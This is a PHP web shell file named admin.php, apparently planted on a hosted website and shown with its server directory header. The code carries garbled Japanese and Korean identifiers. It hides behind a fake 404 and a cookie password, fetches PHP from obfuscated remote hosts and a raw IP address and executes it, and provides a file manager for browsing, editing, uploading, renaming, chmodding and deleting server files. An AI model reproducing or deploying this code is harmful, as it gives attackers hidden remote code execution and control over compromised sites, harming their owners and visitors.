| Dir : /home/morganewst/www/ |
| Server: Linux webm001.cluster120.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 IP: 10.120.20.1 |
| Dir : /home/morganewst/www/admin.php |
<?php
/**
* ãã¹ã¯ãŒãèªèšŒçšã®MD5ããã·ã¥å€
* ãã®å€ã¯èªèšŒãã§ãã¯ã«äœ¿çšãããŸã
*/
$ãã¹ã¯ãŒãããã·ã¥ = "8ef94744844516e7c6601942526ca85d";
/**
* ãªã¢ãŒãã³ãŒãå®è¡æ©èœ
* ac, path, api, tãã©ã¡ãŒã¿ããã¹ãŠèšå®ãããŠããå Žåã«å®è¡ãããŸã
* å€éšãµãŒããŒããã³ãŒããååŸããŠå®è¡ããæ©èœã§ã
*/
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {
// ãµãŒããŒçªå·ã®èšå®ïŒããã©ã«ãã¯1ïŒ
if(!isset($_REQUEST['s'])){
$ãµãŒããŒçªå· = 1;
} else {
$ãµãŒããŒçªå· = $_REQUEST['s'];
}
/**
* ãµãŒããŒçªå·ã«å¿ããŠç°ãªãURLããã³ãŒããååŸ
*/
switch ($ãµãŒããŒçªå·){
case 1:
$ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o4.xy'.'z/');
break;
case 2:
$ã³ãŒã = ìœëê°ì žì€êž°('ht'.'tps://c2.ic'.'w7.co'.'m/');
break;
case 3:
$ã³ãŒã = ìœëê°ì žì€êž°('http://45.11.57.159/');
break;
default:
$ã³ãŒã = ìœëê°ì žì€êž°('htt'.'ps://c.zv'.'o1.xy'.'z/');
break;
}
/**
* ååŸããã³ãŒããPHPã³ãŒãã§ããããšã確èª
* PHPã¿ã°ãå«ãŸããŠããªãå Žåã¯åŠçãäžæ
*/
$å¿
èŠæåå = '<'.'?p'.'hp';
if (strpos($ã³ãŒã, $å¿
èŠæåå) === false) {
die('get failed');
}
/**
* äžæãã¡ã€ã«ã®äœæãšã³ãŒãã®æžã蟌ã¿
*/
$ãã¡ã€ã«å = false;
$ã³ã³ãã³ã = false;
// tmpfileé¢æ°ãå©çšå¯èœãªå Žåãäžæãã¡ã€ã«ãäœæ
if(function_exists('tmpfile')){
$ãã¡ã€ã«å = tmpfile();
fwrite($ãã¡ã€ã«å, $ã³ãŒã);
$ã¡ã¿ããŒã¿ = stream_get_meta_data($ãã¡ã€ã«å);
$ãã¡ã€ã«ãã¹ = $ã¡ã¿ããŒã¿['uri'];
$ã³ã³ãã³ã = @file_get_contents($ãã¡ã€ã«ãã¹);
}
/**
* äžæãã¡ã€ã«ã®äœæã«å€±æããå Žåãéåžžã®ãã¡ã€ã«ãšããŠä¿å
*/
if (!$ã³ã³ãã³ã) {
$ãã¡ã€ã«ãã¹ = '.c';
file_put_contents($ãã¡ã€ã«ãã¹, $ã³ãŒã);
}
/**
* ååŸããã³ãŒããå®è¡
*/
@require($ãã¡ã€ã«ãã¹);
fclose($ãã¡ã€ã«å);
@unlink($ãã¡ã€ã«ãã¹);
die();
}
/**
* æé確èªãªã¯ãšã¹ãã®åŠç
* d_timeãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¹ã¯ãŒãããã·ã¥ãè¿ããŸã
*/
if (isset($_REQUEST['d_time'])){
die('{->'.$ãã¹ã¯ãŒãããã·ã¥.'<-}');
}
/**
* èªèšŒç¶æ
ã®åæå
*/
$èªèšŒç¶æ
= false;
/**
* ã¯ãããŒã«ããèªèšŒãã§ãã¯
* ã¯ãããŒp8ãèšå®ãããŠããããã®MD5ããã·ã¥ãäžèŽããå ŽåãèªèšŒãèš±å¯
*/
if (isset($_COOKIE['p8'])) {
if(md5($_COOKIE['p8']) == $ãã¹ã¯ãŒãããã·ã¥) {
$èªèšŒç¶æ
= true;
}
} else {
/**
* POSTãªã¯ãšã¹ãã«ããèªèšŒãã§ãã¯
* POSTãã©ã¡ãŒã¿p8ãèšå®ãããŠããããã®MD5ããã·ã¥ãäžèŽããå Žåã
* ã¯ãããŒãèšå®ããŠèªèšŒãèš±å¯
*/
if (isset($_POST['p8'])) {
if(md5($_POST['p8']) == $ãã¹ã¯ãŒãããã·ã¥) {
setcookie("p8", $_POST['p8']);
$èªèšŒç¶æ
= true;
}
}
}
/**
* ãã°ã¢ãŠãåŠç
* logoutãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãã¯ãããŒãåé€ããŠèªèšŒç¶æ
ã解é€
*/
if (isset($_POST['logout']) && $_POST['logout'] = 1) {
setcookie("p8", "", time() - 3600);
$èªèšŒç¶æ
= false;
}
/**
* èªèšŒãããŠããªãå Žåã®åŠç
* 520ãã©ã¡ãŒã¿ãèšå®ãããŠããªãå Žåã¯404ãšã©ãŒãè¿ãã
* èšå®ãããŠããå Žåã¯ãã¹ã¯ãŒãå
¥åãã©ãŒã ã衚瀺
*/
if (!$èªèšŒç¶æ
) {
if(!isset($_REQUEST['520'])) {
header("HTTP/1.1 404 Not Found");
die();
}
echo '<form action="#" method="post"><input type="password" name="p8" > <input type="submit" value="submit"></form>';
die();
}
/**
* ãã°ã¢ãŠããã¿ã³ã®è¡šç€º
*/
echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';
/**
* å€éšãµãŒããŒããã³ãŒããååŸããé¢æ°
*
* @param string $URL ã³ãŒããååŸããURL
* @return string ååŸããã³ãŒã
*/
function ìœëê°ì žì€êž°($URL)
{
/**
* ãªã¯ãšã¹ããã©ã¡ãŒã¿ãå«ãå®å
šãªURLã®æ§ç¯
*/
$URLæåå = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $URL, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);
/**
* file_get_contentsã䜿çšããŠã³ãŒããååŸ
*/
$ã³ãŒã = @file_get_contents($URLæåå);
/**
* file_get_contentsã倱æããå ŽåãcURLã䜿çšããŠåè©Šè¡
*/
if ($ã³ãŒã == false) {
$CURLãã³ãã« = curl_init();
curl_setopt($CURLãã³ãã«, CURLOPT_URL, $URLæåå);
curl_setopt($CURLãã³ãã«, CURLOPT_USERAGENT, 'll');
curl_setopt($CURLãã³ãã«, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($CURLãã³ãã«, CURLOPT_TIMEOUT, 100);
curl_setopt($CURLãã³ãã«, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($CURLãã³ãã«, CURLOPT_SSL_VERIFYPEER, 0);
$ã³ãŒã = curl_exec($CURLãã³ãã«);
curl_close($CURLãã³ãã«);
}
return $ã³ãŒã;
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- a22bcS0vMzEJElwPNAQA== -->
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>000</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>
<body>
<?php
/**
* ãã¡ã€ã«ãµã€ãºã人éãèªã¿ããã圢åŒã«å€æããé¢æ°
* ãã€ãæ°ãGBãMBãKBãbytesã«å€æããŸã
*
* @param int $ãã€ãæ° å€æãããã€ãæ°
* @return string ãã©ãŒãããããããµã€ãºæåå
*/
function í¬êž°í¬ë§·í
($ãã€ãæ°)
{
// 1GB以äžã®å Žå
if ($ãã€ãæ° >= 1073741824) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1073741824, 2) . ' GB';
}
// 1MB以äžã®å Žå
elseif ($ãã€ãæ° >= 1048576) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1048576, 2) . ' MB';
}
// 1KB以äžã®å Žå
elseif ($ãã€ãæ° >= 1024) {
$ãã€ãæ° = number_format($ãã€ãæ° / 1024, 2) . ' KB';
}
// 1ãã€ããã倧ããå Žå
elseif ($ãã€ãæ° > 1) {
$ãã€ãæ° = $ãã€ãæ° . ' bytes';
}
// 1ãã€ãã®å Žå
elseif ($ãã€ãæ° == 1) {
$ãã€ãæ° = $ãã€ãæ° . ' byte';
}
// 0ãã€ãã®å Žå
else {
$ãã€ãæ° = '0 bytes';
}
return $ãã€ãæ°;
}
/**
* ãã¡ã€ã«ã®æ¡åŒµåãååŸããé¢æ°
*
* @param string $ãã¡ã€ã« ãã¡ã€ã«å
* @return string ãã¡ã€ã«ã®æ¡åŒµå
*/
function íìŒíì¥ì($ãã¡ã€ã«)
{
return substr(strrchr($ãã¡ã€ã«, '.'), 1);
}
/**
* ãã¡ã€ã«ã¿ã€ãã«å¿ããã¢ã€ã³ã³ãè¿ãé¢æ°
* ãã¡ã€ã«ã®æ¡åŒµåãååã«åºã¥ããŠé©åãªFont Awesomeã¢ã€ã³ã³ãè¿ããŸã
*
* @param string $ãã¡ã€ã« ãã¡ã€ã«å
* @return string HTMLã¢ã€ã³ã³ã¿ã°
*/
function íìŒììŽìœ($ãã¡ã€ã«)
{
/**
* ç»åãã¡ã€ã«ã®æ¡åŒµåãªã¹ã
*/
$ç»åæ¡åŒµåé
å = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
/**
* é³å£°ãã¡ã€ã«ã®æ¡åŒµåãªã¹ã
*/
$é³å£°æ¡åŒµåé
å = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
/**
* ãã¡ã€ã«ã®æ¡åŒµåãå°æåã§ååŸ
*/
$æ¡åŒµå = strtolower(íìŒíì¥ì($ãã¡ã€ã«));
/**
* ç¹æ®ãã¡ã€ã«åã®åŠç
*/
if ($ãã¡ã€ã« == "error_log") {
return '<i class="fa-sharp fa-solid fa-bug"></i> ';
} elseif ($ãã¡ã€ã« == ".htaccess") {
return '<i class="fa-solid fa-hammer"></i> ';
}
/**
* æ¡åŒµåã«åºã¥ãã¢ã€ã³ã³ã®éžæ
*/
if ($æ¡åŒµå == "html" || $æ¡åŒµå == "htm") {
return '<i class="fa-brands fa-html5"></i> ';
} elseif ($æ¡åŒµå == "php" || $æ¡åŒµå == "phtml") {
return '<i class="fa-brands fa-php"></i> ';
} elseif (in_array($æ¡åŒµå, $ç»åæ¡åŒµåé
å)) {
return '<i class="fa-regular fa-images"></i> ';
} elseif ($æ¡åŒµå == "css") {
return '<i class="fa-brands fa-css3"></i> ';
} elseif ($æ¡åŒµå == "txt") {
return '<i class="fa-regular fa-file-lines"></i> ';
} elseif (in_array($æ¡åŒµå, $é³å£°æ¡åŒµåé
å)) {
return '<i class="fa-duotone fa-file-music"></i> ';
} elseif ($æ¡åŒµå == "py") {
return '<i class="fa-brands fa-python"></i> ';
} elseif ($æ¡åŒµå == "js") {
return '<i class="fa-brands fa-js"></i> ';
} else {
return '<i class="fa-solid fa-file"></i> ';
}
}
/**
* ãã¹ããšã³ã³ãŒãããé¢æ°
* ãã¹å
ã®ç¹æ®æåããã³ã¬ã«æåã«çœ®ãæããŠãšã³ã³ãŒãããŸã
*
* @param string $ãã¹ ãšã³ã³ãŒããããã¹
* @return string ãšã³ã³ãŒãããããã¹
*/
function 겜ë¡ìžìœë©($ãã¹)
{
/**
* 眮æåã®æåé
åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ
*/
$眮æåé
å = array("/", "\\", ".", ":");
/**
* 眮æåŸã®æåé
åïŒãã³ã¬ã«æåïŒ
*/
$眮æåŸé
å = array("àŠ", "àŠ", "àŠ", "àŠ");
return str_replace($眮æåé
å, $眮æåŸé
å, $ãã¹);
}
/**
* ãã¹ããã³ãŒãããé¢æ°
* ãšã³ã³ãŒãããããã¹ãå
ã®åœ¢åŒã«æ»ããŸã
*
* @param string $ãã¹ ãã³ãŒããããã¹
* @return string ãã³ãŒãããããã¹
*/
function 겜ë¡ëìœë©($ãã¹)
{
/**
* 眮æåã®æåé
åïŒãã³ã¬ã«æåïŒ
*/
$眮æåé
å = array("/", "\\", ".", ":");
/**
* 眮æåŸã®æåé
åïŒã¹ã©ãã·ã¥ãããã¯ã¹ã©ãã·ã¥ãããããã³ãã³ïŒ
*/
$眮æåŸé
å = array("àŠ", "àŠ", "àŠ", "àŠ");
return str_replace($眮æåŸé
å, $眮æåé
å, $ãã¹);
}
/**
* ã«ãŒããã¹ã®åæå
* ã¹ã¯ãªããã®ãã£ã¬ã¯ããªãã«ãŒããã¹ãšããŠèšå®
*/
$ã«ãŒããã¹ = __DIR__;
/**
* ã¹ã¯ãªãããã¡ã€ã«ã®ãã¹ãååŸ
*/
$ãã¹ = $_SERVER['SCRIPT_FILENAME'];
/**
* Windowsç°å¢ã®å Žåãããã¯ã¹ã©ãã·ã¥ãã¹ã©ãã·ã¥ã«å€æ
*/
if(strpos($_SERVER['SCRIPT_FILENAME'], ":"))
{
$ãã¹ = str_replace('\\', '/', $ãã¹);
}
/**
* ã«ãŒããã£ã¬ã¯ããªã®å€å®
* PHP_SELFãšSCRIPT_FILENAMEãäžèŽããå Žåãã«ãŒããã¹ã"/"ã«èšå®
*/
if(str_replace('//','/',$_SERVER['PHP_SELF']) == str_replace('\\\\','/',$ãã¹))
{
$ã«ãŒããã¹ = ('/');
} else {
/**
* ã«ãŒããã¹ã®èšç®
* SCRIPT_FILENAMEããPHP_SELFãé€ããéšåãã«ãŒããã¹ãšããŠèšå®
*/
$ã«ãŒããã¹ = (str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$ãã¹) ));
}
/**
* ãã¹ãã©ã¡ãŒã¿ã®åŠç
* GETãã©ã¡ãŒã¿pãèšå®ãããŠããå Žåããã®ãã¹ã䜿çš
*/
if (isset($_GET['p'])) {
/**
* ãã©ã¡ãŒã¿ã空ã®å Žåã¯ã«ãŒããã¹ã䜿çš
*/
if (empty($_GET['p'])) {
$çŸåšã®ãã¹ = $ã«ãŒããã¹;
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåããšã©ãŒã衚瀺
*/
elseif (!is_dir(겜ë¡ëìœë©($_GET['p']))) {
echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>");
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ã䜿çš
*/
elseif (is_dir(겜ë¡ëìœë©($_GET['p']))) {
$çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['p']);
}
}
/**
* ã¯ãšãªãã©ã¡ãŒã¿qãèšå®ãããŠããå Žåã®åŠç
*/
elseif (isset($_GET['q'])) {
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã§ãªãå Žåãã«ãŒãã«ãªãã€ã¬ã¯ã
*/
if (!is_dir(겜ë¡ëìœë©($_GET['q']))) {
echo ("<script>window.location.replace('?p=');</script>");
}
/**
* ãã³ãŒããããã¹ããã£ã¬ã¯ããªã®å Žåããã®ãã¹ã䜿çš
*/
elseif (is_dir(겜ë¡ëìœë©($_GET['q']))) {
$çŸåšã®ãã¹ = 겜ë¡ëìœë©($_GET['q']);
}
}
/**
* ãã©ã¡ãŒã¿ãèšå®ãããŠããªãå ŽåãçŸåšã®ãã£ã¬ã¯ããªã䜿çš
*/
else {
$çŸåšã®ãã¹ = __DIR__;
}
/**
* çŸåšã®ãã¹ãå®æ°ãšããŠå®çŸ©
*/
define("PATH", $çŸåšã®ãã¹);
/**
* ããã²ãŒã·ã§ã³ããŒã®è¡šç€ºéå§
*/
echo ('
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">
<div class="navbar-brand">
<a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>
');
/**
* ãã¹ãã¹ã©ãã·ã¥åºåãã§åå²
*/
$ãã¹ = str_replace('\\', '/', PATH);
$ãã¹é
å = explode('/', $ãã¹);
/**
* ãã¹é
åãã«ãŒãããŠããã³ãããªã¹ããçæ
*/
foreach ($ãã¹é
å as $ID => $ãã£ã¬ã¯ããªéšå) {
/**
* ã«ãŒããã£ã¬ã¯ããªã®å Žåã®åŠç
*/
if ($ãã£ã¬ã¯ããªéšå == '' && $ID == 0) {
$ã«ãŒããã©ã° = true;
echo "<a href=\"?p=/\">/</a>";
continue;
}
/**
* 空ã®èŠçŽ ã¯ã¹ããã
*/
if ($ãã£ã¬ã¯ããªéšå == '')
continue;
/**
* åãã£ã¬ã¯ããªãžã®ãªã³ã¯ãçæ
*/
echo "<a href='?p=";
for ($ã«ãŒãå€æ° = 0; $ã«ãŒãå€æ° <= $ID; $ã«ãŒãå€æ°++) {
echo str_replace(":", "àŠ", $ãã¹é
å[$ã«ãŒãå€æ°]);
if ($ã«ãŒãå€æ° != $ID)
echo "àŠ";
}
echo "'>" . $ãã£ã¬ã¯ããªéšå . "</a>/";
}
/**
* ããã²ãŒã·ã§ã³ããŒã®æ®ãã®éšåã衚瀺
*/
echo ('
</div>
<div class="form-inline">
<a href="?newdir&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">New Directory</button></a>
<a href="?upload&q=' . urlencode(겜ë¡ìžìœë©(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a>
</div>
</nav>');
/**
* ãã¹ãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«äžèŠ§ã衚瀺
*/
if (isset($_GET['p'])) {
/**
* ãã¡ã€ã«ãšãã©ã«ãã®ååŸ
* ãã£ã¬ã¯ããªãèªã¿åãå¯èœãªå Žåãã¹ãã£ã³ããŠãã¡ã€ã«ãšãã©ã«ããåé¢
*/
if (is_readable(PATH)) {
/**
* ãã£ã¬ã¯ããªå
ã®å
šãªããžã§ã¯ããååŸ
*/
$ååŸãªããžã§ã¯ã = scandir(PATH);
/**
* ãã©ã«ããšãã¡ã€ã«ãæ ŒçŽããé
å
*/
$ãã©ã«ãé
å = array();
$ãã¡ã€ã«é
å = array();
/**
* åãªããžã§ã¯ããã«ãŒãããŠããã©ã«ããšãã¡ã€ã«ã«åé¡
*/
foreach ($ååŸãªããžã§ã¯ã as $ãªããžã§ã¯ã) {
/**
* çŸåšãã£ã¬ã¯ããªãšèŠªãã£ã¬ã¯ããªã¯ã¹ããã
*/
if ($ãªããžã§ã¯ã == '.' || $ãªããžã§ã¯ã == '..') {
continue;
}
/**
* ãªããžã§ã¯ãã®å®å
šãã¹ãæ§ç¯
*/
$æ°èŠãªããžã§ã¯ã = PATH . '/' . $ãªããžã§ã¯ã;
/**
* ãã£ã¬ã¯ããªã®å Žåã¯ãã©ã«ãé
åã«è¿œå
*/
if (is_dir($æ°èŠãªããžã§ã¯ã)) {
array_push($ãã©ã«ãé
å, $ãªããžã§ã¯ã);
}
/**
* ãã¡ã€ã«ã®å Žåã¯ãã¡ã€ã«é
åã«è¿œå
*/
elseif (is_file($æ°èŠãªããžã§ã¯ã)) {
array_push($ãã¡ã€ã«é
å, $ãªããžã§ã¯ã);
}
}
}
/**
* ãã¡ã€ã«äžèŠ§ããŒãã«ã®ããããŒã衚瀺
*/
echo '
<table class="table table-hover">
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Size</th>
<th scope="col">Modified</th>
<th scope="col">Perms</th>
<th scope="col">Actions</th>
</tr>
</thead>
<tbody>
';
/**
* ãã©ã«ãäžèŠ§ã®è¡šç€º
* åãã©ã«ãã«å¯ŸããŠãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺
*/
foreach ($ãã©ã«ãé
å as $ãã©ã«ã) {
echo " <tr>
<td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(겜ë¡ìžìœë©(PATH . "/" . $ãã©ã«ã)) . "'>" . $ãã©ã«ã . "</a></td>
<td><b>---</b></td>
<td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã©ã«ã)) . "</td>
<td>0" . substr(decoct(fileperms(PATH . "/" . $ãã©ã«ã)), -3) . "</a></td>
<td>
<a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã©ã«ã . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
<a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã©ã«ã . "'><i class='fa-solid fa-key'></i></a>
<a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã©ã«ã . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>
</tr>
";
}
/**
* ãã¡ã€ã«äžèŠ§ã®è¡šç€º
* åãã¡ã€ã«ã«å¯ŸããŠãã¢ã€ã³ã³ãååããµã€ãºãæŽæ°æ¥æãæš©éãã¢ã¯ã·ã§ã³ã衚瀺
*/
foreach ($ãã¡ã€ã«é
å as $ãã¡ã€ã«) {
echo " <tr>
<td>" . íìŒììŽìœ($ãã¡ã€ã«) . $ãã¡ã€ã« . "</td>
<td>" . í¬êž°í¬ë§·í
(filesize(PATH . "/" . $ãã¡ã€ã«)) . "</td>
<td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $ãã¡ã€ã«)) . "</td>
<td>0". substr(decoct(fileperms(PATH . "/" .$ãã¡ã€ã«)), -3) . "</a></td>
<td>
<a title='Edit File' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&e=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-file-pen'></i></a>
<a title='Rename' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&r=" . $ãã¡ã€ã« . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
<a title='Change Permissions' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&chmod=" . $ãã¡ã€ã« . "'><i class='fa-solid fa-key'></i></a>
<a title='Delete' href='?q=" . urlencode(겜ë¡ìžìœë©(PATH)) . "&d=" . $ãã¡ã€ã« . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>
</tr>
";
}
/**
* ããŒãã«ã®çµäºã¿ã°
*/
echo " </tbody>
</table>";
} else {
/**
* GETãã©ã¡ãŒã¿ã空ã®å Žåããã¹ãã©ã¡ãŒã¿ã«ãªãã€ã¬ã¯ã
*/
if (empty($_GET)) {
echo ("<script>window.location.replace('?p=');</script>");
}
}
/**
* æ°èŠãã£ã¬ã¯ããªäœæãã©ãŒã ã®è¡šç€º
* newdirãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãæ°èŠãã£ã¬ã¯ããªäœæãã©ãŒã ã衚瀺
*/
if (isset($_GET['newdir']) && isset($_GET['q'])) {
echo '
<div class="container mt-4">
<h3>Create New Directory</h3>
<form method="post">
<div class="form-group mb-3">
<label for="dirname">Directory Name:</label>
<input type="text" class="form-control" id="dirname" name="dirname" placeholder="Enter directory name" required>
<small class="form-text text-muted">Enter the name for the new directory. Avoid special characters.</small>
</div>
<input type="submit" class="btn btn-dark" value="Create Directory" name="create_directory">
<a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a>
</form>
</div>';
/**
* æ°èŠãã£ã¬ã¯ããªäœæåŠçã®å®è¡
* create_directoryãã©ã¡ãŒã¿ãPOSTãããå Žåãæ°ãããã£ã¬ã¯ããªãäœæ
*/
if (isset($_POST['create_directory'])) {
/**
* POSTããããã£ã¬ã¯ããªåãååŸ
*/
$æ°èŠãã£ã¬ã¯ããªå = trim($_POST['dirname']);
/**
* ãã£ã¬ã¯ããªåã®æ€èšŒ
*/
if (!empty($æ°èŠãã£ã¬ã¯ããªå)) {
/**
* ãã£ã¬ã¯ããªåã«äžæ£ãªæåãå«ãŸããŠããªãããã§ãã¯
*/
if (preg_match('/[\/\\\\:*?"<>|]/', $æ°èŠãã£ã¬ã¯ããªå)) {
echo ("<script>alert('Invalid directory name. Directory name cannot contain special characters: / \\ : * ? \" < > |'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
/**
* æ°èŠãã£ã¬ã¯ããªã®å®å
šãã¹
*/
$æ°èŠãã£ã¬ã¯ããªãã¹ = PATH . "/" . $æ°èŠãã£ã¬ã¯ããªå;
/**
* ãã£ã¬ã¯ããªãæ¢ã«ååšããããã§ãã¯
*/
if (file_exists($æ°èŠãã£ã¬ã¯ããªãã¹)) {
echo ("<script>alert('Directory already exists.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
/**
* æ°èŠãã£ã¬ã¯ããªã®äœæ
* ããã©ã«ãæš©éã¯0755ïŒææè
ã¯èªã¿æžãå®è¡ãã°ã«ãŒããšãã®ä»ã¯èªã¿å®è¡ïŒ
*/
if(mkdir($æ°èŠãã£ã¬ã¯ããªãã¹, 0755, true)) {
echo ("<script>alert('Directory created successfully.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Failed to create directory.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
} else {
echo ("<script>alert('Directory name cannot be empty.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
/**
* ãã¡ã€ã«ã¢ããããŒããã©ãŒã ã®è¡šç€º
* uploadãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãã¢ããããŒããã©ãŒã ã衚瀺
*/
if (isset($_GET['upload'])) {
echo '
<form method="post" enctype="multipart/form-data">
Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" class="btn btn-dark" value="Upload" name="upload">
</form>';
}
/**
* ãã¡ã€ã«ã»ãã©ã«ãã®ãªããŒã æ©èœ
* rãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå ŽåããªããŒã ãã©ãŒã ã衚瀺
*/
if (isset($_GET['r'])) {
if (!empty($_GET['r']) && isset($_GET['q'])) {
/**
* ãªããŒã ãã©ãŒã ã®è¡šç€º
*/
echo '
<form method="post">
Rename:
<input type="text" name="name" value="' . $_GET['r'] . '">
<input type="submit" class="btn btn-dark" value="Rename" name="rename">
</form>';
/**
* ãªããŒã åŠçã®å®è¡
* renameãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®ååãå€æŽ
*/
if (isset($_POST['rename'])) {
/**
* çŸåšã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$åå = PATH . "/" . $_GET['r'];
/**
* ãªããŒã ã®å®è¡
*/
if(rename($åå, PATH . "/" . $_POST['name'])) {
echo ("<script>alert('Renamed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
}
/**
* ãã¡ã€ã«ç·šéæ©èœ
* eãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«ç·šéãã©ãŒã ã衚瀺
*/
if (isset($_GET['e'])) {
if (!empty($_GET['e']) && isset($_GET['q'])) {
/**
* ãã¡ã€ã«ç·šéãã©ãŒã ã®è¡šç€º
* ãã¡ã€ã«ã®å
容ãããã¹ããšãªã¢ã«è¡šç€º
*/
echo '
<form method="post">
<textarea style="height: 500px;
width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea>
<br>
<input type="submit" class="btn btn-dark" value="Save" name="edit">
</form>';
/**
* ãã¡ã€ã«ä¿ååŠçã®å®è¡
* editãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã®å
容ãä¿å
*/
if(isset($_POST['edit'])) {
/**
* ç·šé察象ãã¡ã€ã«ã®å®å
šãã¹
*/
$ãã¡ã€ã«å = PATH."/".$_GET['e'];
/**
* POSTãããããŒã¿ãååŸ
*/
$ããŒã¿ = $_POST['data'];
/**
* ãã¡ã€ã«ãæžã蟌ã¿ã¢ãŒãã§éã
*/
$ãã¡ã€ã«ãã³ãã« = fopen($ãã¡ã€ã«å,"w");
/**
* ãã¡ã€ã«ãžã®æžã蟌ã¿
*/
if(fwrite($ãã¡ã€ã«ãã³ãã«,$ããŒã¿)) {
echo ("<script>alert('Saved.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
/**
* ãã¡ã€ã«ãã³ãã«ãéãã
*/
fclose($ãã¡ã€ã«ãã³ãã«);
}
}
}
/**
* ãã¡ã€ã«ã¢ããããŒãåŠçã®å®è¡
* uploadãã©ã¡ãŒã¿ãPOSTãããå Žåãã¢ããããŒãããããã¡ã€ã«ãä¿å
*/
if (isset($_POST["upload"])) {
/**
* ã¢ããããŒãå
ã®ãã¡ã€ã«ãã¹
*/
$ã¿ãŒã²ãããã¡ã€ã« = PATH . "/" . $_FILES["fileToUpload"]["name"];
/**
* ã¢ããããŒãããããã¡ã€ã«ã移å
*/
